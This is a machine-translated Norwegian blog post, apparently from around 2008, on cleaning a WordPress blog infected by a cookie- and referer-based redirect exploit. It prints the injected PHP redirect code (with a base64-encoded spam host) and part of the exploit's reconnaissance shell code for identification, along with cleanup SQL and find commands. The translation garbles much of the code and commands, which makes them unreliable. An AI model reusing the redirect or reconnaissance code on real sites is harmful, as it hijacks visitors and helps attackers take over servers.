Bloggosfæren virus ... men jeg har hatt det?!

Siste måned, vi alle fått advarsler virus i bloggen fra noen besøkende. Utgangspunktet jeg ignorerte advarslene, fordi jeg hadde ganske god antivirus installert (Kaspersky AV 2009) Og selv blogg i lang tid, jeg har aldri fått et virus alert (lenge siden .. Jeg så noe mistanke om at den første refresh forsvant. Endelig ...).
Sakte begynte å vise store variasjoner besøkende trafikkEtter som det siste har falt jevnt og trafikken begynte å bli flere og flere mennesker som forteller meg at stealthsettings.com den er Virus. I går fikk jeg fra noen et skjermbilde gjort når antivirus blokkert en script på stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Det var overbevisende nok for meg at jeg skal ha søkt alle kilder. Den første tanken som kom til meg var å gjøre oppgradering den nyeste WordPress (2.5.1), men ikke før den gamle skriptet for å slette alle filer av WordPress og gjøre backup database. Denne prosedyren har vært mislykket og sannsynligvis ville ha tatt lang tid å finne Sema hvor det koke, hvis jeg ville ha sagt i en diskusjon over kaffe, fant han Google og det ville være fint å se ham.
MyDigitalLife.info publiserte en artikkel med tittelen: "WordPress Hack: Gjenvinn og Fix Google og søkemotoren eller Nei Cookie Trafikk omdirigert til Din-Needs.info, AnyResults.Net, Golden-Info.net og andre ulovlige nettsteder"Det er slutten av tråden jeg trengte.
Det handler om en utnytte WordPress basert på cookieSom jeg tror er svært kompleks og gjort boken. Smarte nok til å gjøre en SQL Injection Database blogg, å opprette en usynlig bruker en enkel rutinekontroll Dashbord->brukere, sjekk server kataloger og filer "skrivbare" (Med chmod 777), å søke og henrette filer med rettighetene til gruppen eller roten. Jeg vet ikke hvem utnytte navnet og se at det er få artikler som er skrevet om ham, til tross for at mange blogger er smittet, inkludert Romania. Ok ... Jeg vil prøve å prøve å forklare generaliteter om viruset.

Hva er virus?

Først settes kilder sidene på blogger, lenker usynlig for besøkende, men synlig og indeksere for søkemotorer, særlig Google. På denne måten transfer Page Rank områder angitt av angriperen. Sekund, settes omdirigering kode URL for besøkende som kommer fra Google, Live, Yahoo, ... eller en RSS-leser og ikke nettstedet i cookie. en antivirus oppdager viderekoblingen som Trojan-Clicker.HTML.

Symptomer:

Redusert massive besøkende trafikkSpesielt på blogger hvor de fleste besøkende kommer fra Google.

Identifikasjon: (Derav komplisere problemet for de som ikke vet hvordan hvordan phpmyadmin, php og linux)

LA. ADVARSEL! Først gjøre en backup database!

1. Sjekk kildefilene index.php, header.php, footer.phpEr temaet for bloggen og se om det er en kode som bruker kryptering base64 eller inneholder "if ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "form:

<? Php
$ Seref = array ("google", "msn", "leve", "AltaVista"
"Ask", "yahoo", "AOL", "cnn", "vær", "alexa");
$ Ser = 0; foreach ($ Seref som $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == false) {$ ser = "1;? Break;}!
if ($ ser == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); exit;
}>

... Eller noe. Slett denne koden!

Klikk på bildet ...

kode indeks

I skjermbildet ovenfor uhell jeg valgte "<Php get_header ();?>". Denne koden skal være.

2. Bruk phpMyAdmin og gå til databasen tabellen wp_usersHvor sjekke om det er noen navn opprettet på 00:00:00 0000-00-00 (Mulig i feltet user_login skrive "WordPress". Legg merke til bruker-ID (felt ID) og deretter slette den.

Klikk på bildet ...

Fake bruker

* Den grønne linjen bør fjernes og beholdt sin ID. I tilfelle av Var ID = 8 .

3. Gå til Table wp_usermeta, Hvor du ligger og tørk linjer for ID (der feltet user_id ID-verdien fjernes).

4. I tabell wp_option, Å gå active_plugins og se hva plugin er aktivert mistenkte. Den kan brukes som avslutninger _old.giff, _old.pngg, _old.jpeg, _new.php.giffOsv utvidelser kombinasjoner med _old og _new falsk bilde.

HVOR SELECT * FROM wp_options option_name = 'active_plugins'

Slett denne plugin, og deretter gå til bloggen -> Dashboard -> Plugins og aktivere en plugin som deaktiverer sikker.

Klikk på bildet for å se det vises active_plugins virus fil.

plugg inn

Følg stien på FTP eller SSH, angitt i active_plugins og slette filen fra serveren.

5. Også i phpMyAdmin, i tabell wp_option, Finn og slette linjen som inneholder "rss_f541b3abd05e7962fcab37737f40fad8'Og'internal_links_cache ".
I internal_links_cache tilbød krypterte spam koblinger som vises i en blogg Google Adsense-kode, The hacker.

6. Anbefales å endre passord Blogg og pålogging fjerne alle mistenkelige userele. Oppgrader til den nyeste versjonen av WordPress og sette bloggen til ikke å tillate registrering av nye brukere. Det er ingen tap ... kan kommentere og ulogisk.

Jeg prøvde å forklare ovenfor mer eller mindre, hva du skal gjøre i en slik situasjon, for å rense viruset blogg. Problemet er mer alvorlig enn det ser ut, og ikke på langt nær løst, til bruk sikkerhetsproblemer hosting webserveren, som er blogg.

Som et første tiltak for sikkerhet, med tilgang SSH, Lag noen sjekker på serveren for å se om det er filer som * _old * og * _new. * Med avslutninger.GIFF,. jpeg,. pngg,. jpgg. Disse filene må slettes. Hvis du endrer navn på en fil, for eksempel. top_right_old.giff in top_right_old.phpVi ser at filen er nøyaktig skadelig kode server.

Noen nyttige indikasjoner på kontroll, rengjøring og sikkerhet server. (Via SSH)

1. cd / tmp og sjekke om det er mapper som tmpVFlma eller andre kombinasjoner asemenatoare navn og slette den. Se skjermbilde nedenfor, to slike mapper til meg:

tmpserver

rm-rf mappenavn

2. Sjekk elimiati (skifte chmod-post) mapper med attributter som mulig chmod 777

finne alle skrivbare filer i gjeldende dir: Finne. -Type f-perm-2-ls
finne alle skrivbare kataloger i dagens dir: Finne. -Type d-perm-2-ls
finne alle skrivbare kataloger og filer i gjeldende dir: Finne. -Perm-2-ls

3. Ser etter mistenkelige filer på serveren.

Finne. -Navn "* _new.php *"
Finne. -Navn "* _old.php *"
Finne. -Navn "*. Jpgg"
Finne. -Navn "* _giff"
Finne. -Navn "* _pngg"

4, ADVARSEL! filene som har satt litt SUID si SGID. Disse filene kjøre med rettighetene til brukeren (gruppen) eller rot, ikke brukeren som utfører filen. Disse filene kan føre til rot kompromiss, hvis sikkerhetsspørsmål. Hvis du ikke bruker SUID og SGID filer med litt, utføre "chmod 0 " dem eller avinstallere pakken som inneholder dem.

Utnytte inneholder et sted i kilden ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Execute ('sysctl-n kern.ostype').;
$ Os = Execute ('sysctl-n kern.osrelease').;
$ Os = Execute ('sysctl-n kernel.ostype').;
$ Os = Execute ('sysctl-n kernel.osrelease').;
if (empty ($ bruker)) $ user = utføre ('id');
$ Aliases = array (
"=>"
"Finn promiskuøst filer '=>' find /-type f-perm-04000-ls ',
'Finn sgid filer' => 'find /-type f-perm-02000-ls',
'Finn alle skrivbare filer i dagens dir' => 'finne. -Type f-perm-2-ls ',
'Finn alle skrivbare kataloger i dagens dir' => 'finne. -Type d-perm-2-ls ',
'Finn alle skrivbare kataloger og filer i gjeldende dir' => 'finne. -Perm-2-ls ',
'Vis åpnet portene' => 'netstat-an | grep-i lytte',
);
Else {}
. $ Os_name = Execute ('ver');
$ User = Execute ('echo% brukernavn%').;
$ Aliases = array (
"=>"
"Vis runing tjenester '=>' net start"
'Vis prosess list' => 'tasklist'
);
}

Finner den måten ... utgangspunktet sikkerhetsbrudd. Porter åpne katalog "skrivbar" og gruppe gjennomføring privilegier filer / root.

Tilbake med mer ...

Noen blogger smittet: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blogg,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blogg /,

www.mirabilismedia.ro / blogg, Blog.einvest.ro
... Listen fortsetter ... mye.

Du kan sjekke om en blogg er virus, ved hjelp av søkemotoren Google. Copy & Paste:

Site: www.blegoo.com buy

God natt og øke jobbe ;) Snart vil jeg komme til Eugene nyheter på prevezibil.imprevizibil.com.

brb :)

TO: OBS! WordPress tema endring eller oppgradering til WordPress 2.5.1, ikke en løsning for å bli kvitt dette viruset.

Bloggosfæren virus ... men jeg har hatt det?!

Om forfatteren

Stealth

Lidenskapelig opptatt av alt som gadget og IT skrive gjerne stealthsettings.com av 2006 og jeg liker å oppdage nye ting med deg om datamaskiner og MacOS, Linux, Windows, iOS og Android.

Legg igjen en kommentar

Dette nettstedet bruker Akismet for å redusere spam. Lær hvordan kommentaren din behandles.